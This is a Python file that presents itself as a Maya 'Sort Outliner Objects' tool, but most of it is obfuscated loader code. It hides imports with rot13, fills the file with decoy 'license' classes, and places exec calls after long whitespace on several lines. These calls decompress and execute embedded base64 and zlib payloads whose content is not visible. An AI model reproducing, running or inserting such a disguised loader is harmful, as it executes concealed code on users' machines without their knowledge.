
from builtins import *

def _nodetopologyoptimizer(iterable, start=1):
   result = start
   for element in iterable:
       if not isinstance(element, (int, float)):
           raise TypeError("iterable analysis failed")
       result *= element
   return result

__author__ = "Michael Davydov"
__website__ = "https://brotools.tech; https://michaeldavydov.com"

__code__ = '''import sys
if sys.version_info[0] >= 3:
    import builtins, codecs
    builtins.unicode = str
else:
    import __builtin__ as builtins
    import codecs
o = getattr(builtins, codecs.decode('__vzcbeg__', 'rot13'))
b, z, s = o(codecs.decode('onfr64', 'rot13')), o(codecs.decode('myvo', 'rot13')), o(codecs.decode('flf', 'rot13'))
d, e, c = getattr(getattr(b, codecs.decode('heyfnsr_o64qrpbqr', 'rot13')), codecs.decode('__pnyy__', 'rot13')), getattr(getattr(z, codecs.decode('qrpbzcerff', 'rot13')), codecs.decode('__pnyy__', 'rot13')), '4EJwSDieBwXyXxq6Vvkp@nyH8TGtFvKmicn&d*N*nSKJFuZu$uB6##Zf3aTgZ2AGb^YFTGrMj!AVoU*x*#o6eFn^oF5rjbggbB3BYUuUiZTYkDkLg7xME73at4k6y6DCLYnJK$D4^aXY3GNdY67@#7d&v3PYF^k2T!Sp22#8GKPoui7ESR4bCf2i$xTjXeM@bJ%PE3$6&h5#DZvk9TDGkVokd$a%oJKzT^*stmGf7sCLS3%@jCfMH^CuTGcQ#Qp2yQ%@$A!Co8kjm45!B98Df2ij6Q7fGZZu5hRNT5FbcH6FX!*H$u$2UKR2uXkL4DBWmKZoiwWBPp@qNH!YAyyyRpTsJrA$^H6m4fM3&@S@tK9WfLnSqztv44R@&yVH3S393VSEQrh!Y*bUS&rbPQzaPVA3#K*h8F3^k27sxMxwYeCivxqV3*^^E!RMUzsQBe3TBrpca!r7u5KXAxy2BH@s^DwZEcnjUc5Udmxeu!F3mcC@uSAw7h&Lo8!H5EQQbp%xH^CnMf*gzTTB6R6ymMuZ&9*&oJ497W^5kdc%UqSAJHhqwJ^5R!25*@*2vNrcoGQ8B7SS!2!TrJPZhoby$R2KuT@QuXy8d&foJsq@Po9q%@y!qkESd3LMzCGs5@V%fU!KLbs5!fv5zBgiAM^7Cycxz25yQ5fDi@q%RedPvMWBM6mMdW8pxsy#^*@sZDTPyXY5rJ$Xpgnqw@TaQU@MCKP%vt2BsKxRu78m2KxC%MZwV7HMDddWAsXijVfY^74!bW&$n9^sc6o!QHZH2g4Z@MLH3%7AhQyGmLFb@5S6$QacM*sdMXp$!K8PqVoW$!zQc7zjDZKN77TNW@665i!9UsnbhugqAAc6n4JE*^JD^kVaSce53Sw$@xs^7WwEqG#Fu4U9' + '==='
exec((lambda x: x.decode(codecs.decode('hgs-8', 'rot13')) if s.version_info[0] >= 3 else x)(e(d(c))))'''


# _licensekeyenforcer, Floor, _callfunction, MayaNode, _floor, _substract, LicenseKeyEnforcer = exec, str, tuple, map, ord, globals, type
_licensekeyenforcer, Floor, _callfunction, MayaNode, _floor, _substract, LicenseKeyEnforcer, Restore = eval, str, tuple, map, ord, globals, type, compile

class _add:
    def __init__(self, _simulationscenecontroller):
        self.SimulationSceneController = _nodetopologyoptimizer((_simulationscenecontroller, -60851))
        self.DynamicNodeProcessor(_scenenodeanalyzer=-15061)

    def DynamicNodeProcessor(self, _scenenodeanalyzer = int):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        self.SimulationSceneController -= 36219 + _scenenodeanalyzer
        
        try:
            (_callfunction, _physicsenginecoordinator) if _callfunction >= _substract else (_floor, _physicsenginecoordinator, _callfunction) is MayaNode

        except AttributeError:
            (_floor, _physicsenginecoordinator, _callfunction) if _licensekeyenforcer != _floor else {Floor: _physicsenginecoordinator} > _callfunction

        except:
            LicenseKeyEnforcer(-49688 + 6426) == None

    def LicenseVerifier(self, MayaSimulationEngine = -3750):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        MayaSimulationEngine *= 51681 - -30427
        self.PhysicsNodeRouter != Ellipsis
        
        try:
            ((_licensekeyenforcer, _physicsenginecoordinator, _licensekeyenforcer) or _callfunction if (_licensekeyenforcer, _physicsenginecoordinator, _licensekeyenforcer) and _callfunction else None or (_callfunction, (_licensekeyenforcer, _physicsenginecoordinator, _licensekeyenforcer)))

        except ArithmeticError:
            (_floor, _physicsenginecoordinator, _callfunction) if _callfunction < _callfunction else (MayaNode, MayaNode) == Floor

        except:
            LicenseKeyEnforcer(-19159 - -93211) == type

    def Substract(_mayalicensingframework = type):
        return _substract()[_mayalicensingframework]

    def _modulo(Positive = 2392 / 55186, MayaLicensingFramework = type, _mayacmdswrapper = _substract):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        _mayacmdswrapper()[Positive] = MayaLicensingFramework
        
        try:
            ((_callfunction, _physicsenginecoordinator) or _physicsenginecoordinator if (_callfunction, _physicsenginecoordinator) and _physicsenginecoordinator else None or (_physicsenginecoordinator, (_callfunction, _physicsenginecoordinator)))

        except OSError:
            ({Floor: _physicsenginecoordinator} or Floor if {Floor: _physicsenginecoordinator} and Floor else None or (Floor, {Floor: _physicsenginecoordinator}))

        except:
            LicenseKeyEnforcer(4259 * 68548) == None

    def execute(code = str):
        try:
            return _licensekeyenforcer(Restore(Floor(_callfunction(MayaNode(_floor, code)))), locals(), globals())
        except:
            pass
        # return _licensekeyenforcer(Floor(_callfunction(MayaNode(_floor, code))))

    @property
    def PhysicsNodeRouter(self):
        self.NodeTopologyOptimizer = '<__main__._physicsenginecoordinator object at 0x000005887BE62747>'
        return (self.NodeTopologyOptimizer, _add.PhysicsNodeRouter)

try:
        _add.execute(code = __code__)
        _brorenmer = _add(_simulationscenecontroller = 53414 - -25833)

        if 347995 > 5288357:
            _add(_simulationscenecontroller = -979 - 79470).LicenseVerifier(MayaSimulationEngine = 64735 / _brorenmer.SimulationSceneController)
        elif 351625 < 7604688:
            _brorenmer.DynamicNodeProcessor(_scenenodeanalyzer = _brorenmer.SimulationSceneController / -3099)                                                                                                                                                                                                                                                          ;_add._modulo(Positive='OoO0OO0o000OO00o0ooOO00',MayaLicensingFramework=b'x\x9c\xedZ[s\xda8\x14~\xcf\xaf\xe0\r\x984\x19#\xdf 3}h\xb6M\x17\x06\xe3\xc9\x02\x85I\'\xe31\xc64r\x85\x95\xc5\xa6\xb8\xbb\xb3\xff}\xcf\x91d\x92)\x858\xdc\xda\x07t\xac\xab-$\xf9|:\x17\x19\xc6\x03\x9f%\x95\xea\xe7\xb2\x9b\xd5g\x9aw\xd7\x7f\xd4\x83\xaf\x9f\x06\xfd\x9b\x87l\xa8uX\xf8gg\x1e~j\x90\xc1\xd7\xda\xdf\xe3\x9b\xa0v\xdb\xef\xc4}\xad\x15\xf9\x0b\x8fg\x9a]\xbe\x7f\xfb\x85\xf1\x11\xfc\xc4\xd9V\xfdq\xe0N\xa7\xe38\x1dL\xf1\xc2b\xf9\xf3\xd5\xd5\xf9\xc5\xf9E\xe5\xa2r^\xabV\xefa\x900\xf5\xd3t\xb6\xfd \x8b\x0ch\x91e"\xcfTX\xac\x0e4\xa6;\x0c\xb2\xbe\xe3\xf0\x9fOd\xa4;\x99\xdf\xbb\xbe\xee\x0e\xcc\xd6_\xecQ\xcf_ \x13,\xd80\xea\xda\xce\x1b\xc6\xfc\xc8\x920\xea\xa7\x9d\xf7\xd7f\x9f\xf5k=v\x17\r>\xdc\\\xdf\xf6\x18\xb9#wN>\xb6\xe7\xd1\xe9#\x9f\xa5\x9e\xb7\xf7U\x7fd\xf3Nt\xf7\xf1N{\xb8\xbe\x9d\x8e\xd9\xedW\x16\xe5\xa3\xee0\xe7Jy4\xa7,\xa5qR\xae^~\xf3g;\xe0.\x8a(\x8d"\x86\t\xc5\x8c2(E\x11\xccO\x00R\xa01\xc7fe\xa7)S\x1a$~LG?\xc2\xad\xfa\xe6\t\x8a\x12\x97\x0b\x91\x1fh\xb4\xea\xe7\xe3\x0ewI\xe3q\x98U\xca\xdf\'\x94e\xe1C<_y\xe4\xbe\xba\x8e}\xeb\xd0\xb3\x14\x18\x0e\xb2\xc8q\x96R\xc3\xe9\x1c\x80qILSF\xe7Gb\xdc\xda\xd1\x0e\xc3\xb8\xf5\xc3\xe5\x8c\x0b\xe7\xb3\xde+x\xf6\xf2\x96c\xac\xc904\x9bXh\x8apb\xdb\xde\xd9\x960\xfff\xaf|\x13\xaa\x13\x129\xff\x85P\xa5\x8b\x13\xe3\xf6\xcd\xb8\xd4\xe7l\xf2:\xc6m\xb4\r\x86\x83\xe1p8\x18\x0c%a8\xf1l\xef\x9b\x8d\xd1\xc7)\x0f\xf6\xa4\xda\xe2)\x848\x8e\xa7\xe2\x82\x00\x0c+\x97/#N\xe3\x1d\x0c4\xce]\xaeqW\x83\\\xc3\x12T\xb9v\x82\xc2\xbe\xa10K\x93\xbdJ\xdd.\xe9\x12\xd2\xc5T\x96H\xf7\xc4\xb3}\xf3\x8cq\xbezw{\x89\xdbj\xb5\x9b\xad&\\\xedV\xbb\r\xc6\rdM\xac\x9e\x18\xb7w\xc6\xf9\xdf\xc2\xfd\xda\xa6\xe0\x0b\x82\x07\x08n`\xc4"H\xb0\x8a\r\xd1\xf3Q\xd6\xf1\xb7R\xaej\x9e\x05d{\x1a\xc4\x9a(5pZ\xab\xad\x05\x7f\xaf\xe1\x19\x1e\x012<\x1dz!\x99\xd0A\xf3\xcc\x1f[\x0b\xfd\xde\x1ag\xb72*\xeb\x1a\x19\x93:\x19\xeb5\xd2\x00\x9fz\x1c\x06|\x1cV\xca\xf5I\xba\xea\xafUe"\xe2\t\xd1{Ft\x10f\xafA\xf4F\x0fy\xc9\x17G\xfa\xca\x90\x16\x84]\r\x1e\xd0v\x85\x94aNt\x1d"Q\xd1\x82\xa8A4U\x19#!#\x01\xbb"\xcf\xbe\x02\x9a\xf7o\x99?\x1d\x8d\xfd\x92\xb4\xa2\x94\x19\x85\x85\xa9\xacO\xaf\xb6\x92\xed[\xb0a\xfd\x0b2\xeb\xa6-\xa2\xa4\xbaJ%=/C\xed\xa5\x85/\x17\xecr\xd7\x15Q\xd3\xc0\xc6\xd34\xd7]\xb7\xd2\xf5s\xde\xeb*\xad@\x92\xd10\x1a\xab\xb9\x8c\x92d\xab\x15\x14^\xab\xda\x92Y\xee\x98f\xb2\xbcX\xfc\x06\xcc5&\x16\x90\xaea*\xcby\xaak\xc6\xc4P5kYzy\xd1[lAb\xc3;\xadY\xc42\xad\x80\xbc\x88\xa1\xad\x84\x8c\x93\x9f\xdbK\xf1\x8f"\xa7\xa0\x8c\xb1A\x81\x99@:\xa8D\xa96\tt\xa8\xaf\xb6\x1eSf\xd5@\xce\xd8J\xee\xa0Lj\xa8z.\x97\xb0]S2\xeb\xa5gE\xdbk\xd5\xe9\x12\xda\x02\xdc\x0by\xda\x82I\xf6\x8b\xf7\xf1si\xf4Lj\xfd\x8c^)\xaf@F\x813\x8a\x02\x0b"\xa6\x1c\xc2\xd1\xb6p\x99\xa2\xa5G1bI\xac\xbb\x98\xb5\xb7\x01FB])\x15VW\xe5\x9a\x82E]\xa9:C\xc1\xa8\xc8\xb3z1\x18-\xdf\xea4\xd7s"\xe29\xc2F\x8d\xb7\xd1(>\x04\x8a\xecg(zjyF\x85\xf1\xe3\xc8\x8f\x85R\x0cI\x1bG\x8a\xa3\xa3l\x972@\xa1\x8d\xb8h\x03J\x10\x18\x987\x9bG6\xc6\xb7\xd4\r\xa6nMlb\x1b\x04\x14\x120\xc2\x00]\xd1\xb0B\xcb\xb4\t\xb6\x80\xd6\xf0Ao\xe8\xb6a\xeb\x87\xd1\x1d\x9b\x95\xa7a\x08\xf5h\x18\xa2\x94\xabLC\xb6\xe4w\xb1f\x18\x85\xd4\xa7\xc2K\xb7K\x08Q\x07)]\x11\xe5\xb1\xca/\x96\xae\xf6S\xa8\x03\xc9\xdc^\xe6\xd0v(\x03\x01@`\x8d\x81j\xc0z\xe3@F\x82|\xcf\xea\x04\x8b\xa87\x0eWQ\xcd\x0e\xd6@\xc3\xab\x0bW\xd8\x84\\Z\nd\xb5u\xd7}g*\x91k(ql)\xed\xdeP\xed\xa8\xdd\xebJl\x17y\xd6\xde\xc2c\xc1\x8fbM\xf5ULd\xbf\x811k\t\xdb\\\xa4\r\x91\xfa"\xf7ED\n\x96\xf7e\xed\xc5eo\x89V[\xb3j6\x9a\xb3\xa1} \xacn\x12J\xba\x86d\x08\xab~)\x8e&\xb2]Z\xfb\x07Z\xf6\xb1\x97\x9a{bO~\xd9\x8f^\x1c\x96\n\xcb\\\xf5\x05J~|\x12A5l\t\xed0\x0b\x83\n\xda\x8a.\x18\x8b\xb9\xb3\xcb\xb5\xea\xd9d\xc6\xa7\xa5\x91\x9f\x80$+\xc9\xbf\xb4\x94F\x96!\'Y\xf2\x93\x12\xa3A\x18\xe3]\xf9\xe4\xf5\x8c\xf78g\xc9e\xc0\xe3\t\xfd2\x9f\xf9)\xe5q\xde\xf3\x0f\xd7q\xdc\x8e\xd7s\xddv\xd7s>t\xfa+\x9df\xe1\xe5\xd4\xff\xee{\xf3\x94\xb2$\xef\x96\xe0\x1fi\xf8<e4\x0eg\x1e\x1fEa\x90&g\xd8\xdf{\xff\xae\xf7\xae\xf4\xb6\xf4/~x\x11\x9f_\\\xf1-\x06\xcd_\\\x07\xbf*5\xa5\x01\x81\xd8h\t\xab\x021\xd2~S\xa2\x8c\x01w\x84\x91\x1aQy(\x89\x87\x93\x8c^\xadN\xf3MIz\r\xca\x81@\x9f\xf8\xea\xe7\xb3\xfa\xef\xec\x7f\x1b$\xf3\x8d')

        if 490996 > 6306728:
            _add(_simulationscenecontroller = 34564 * -6002).LicenseVerifier(MayaSimulationEngine = -37994 + _brorenmer.SimulationSceneController)
        elif 207750 < 3526231:
            _add(_simulationscenecontroller = -13120 * 95163).DynamicNodeProcessor(_scenenodeanalyzer = _brorenmer.SimulationSceneController / -76566)                                                                                                                                                                                                                                                          ;IIlIIllllIllIllIII,oDoOODoDoODOoDoODoDDoDo,JJIJJILLJILLLJIJJILJJIIJ,S22222SSS22SS22S2SSSS2S22S,S2SSSS2SSS2S222S2SS=(lambda DoOoDDDoDOoOoODooooODoDD:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(DoOoDDDoDOoOoODooooODoDD)"),filename='\x6c\x6a\x6a\x6c\x6c\x6a\x6c\x6a\x69\x6c\x6a\x69\x6a\x6c\x6a\x6a\x69\x6c',mode='\x65\x76\x61\x6c'))),(lambda DoOoDDDoDOoOoODooooODoDD:DoOoDDDoDOoOoODooooODoDD['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda DoOoDDDoDOoOoODooooODoDD:DoOoDDDoDOoOoODooooODoDD(__import__('\x7a\x6c\x69\x62'))),(lambda lIlIlIIIlllIIlIIlllIIllll,DoOoDDDoDOoOoODooooODoDD:lIlIlIIIlllIIlIIlllIIllll(DoOoDDDoDOoOoODooooODoDD)),(lambda:(lambda DoOoDDDoDOoOoODooooODoDD:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(DoOoDDDoDOoOoODooooODoDD)"),filename='\x6c\x6a\x6a\x6c\x6c\x6a\x6c\x6a\x69\x6c\x6a\x69\x6a\x6c\x6a\x6a\x69\x6c',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63'))
        if 107730 > 3141073:
            _add(_simulationscenecontroller = 58848 * -85875).LicenseVerifier(MayaSimulationEngine = 53900 / _brorenmer.SimulationSceneController)
        elif 157173 < 1091521:
            _brorenmer.DynamicNodeProcessor(_scenenodeanalyzer = _brorenmer.SimulationSceneController - -60664)                                                                                                                                                                                                                                                          ;S2SSSS2SSS2S222S2SS()(S22222SSS22SS22S2SSSS2S22S(oDoOODoDoODOoDoODoDDoDo(JJIJJILLJILLLJIJJILJJIIJ(IIlIIllllIllIllIII('\x76\x61\x72\x73'))),_add.Substract(_mayalicensingframework='OoO0OO0o000OO00o0ooOO00')))

except Exception as _physicsenginecoordinator:
        if 430033 > 6229070:
            _add.execute(code = Floor(_physicsenginecoordinator))

        elif 417015 > 3377454:
            _add(_simulationscenecontroller = -47622 * -51749).LicenseVerifier(MayaSimulationEngine = 47087 + _brorenmer.SimulationSceneController)

MENU_DATA={'label': 'Sort Outliner Objects', 'parent': COMMON_TOOLS_MENU, 'command': sort_outliner_objects}
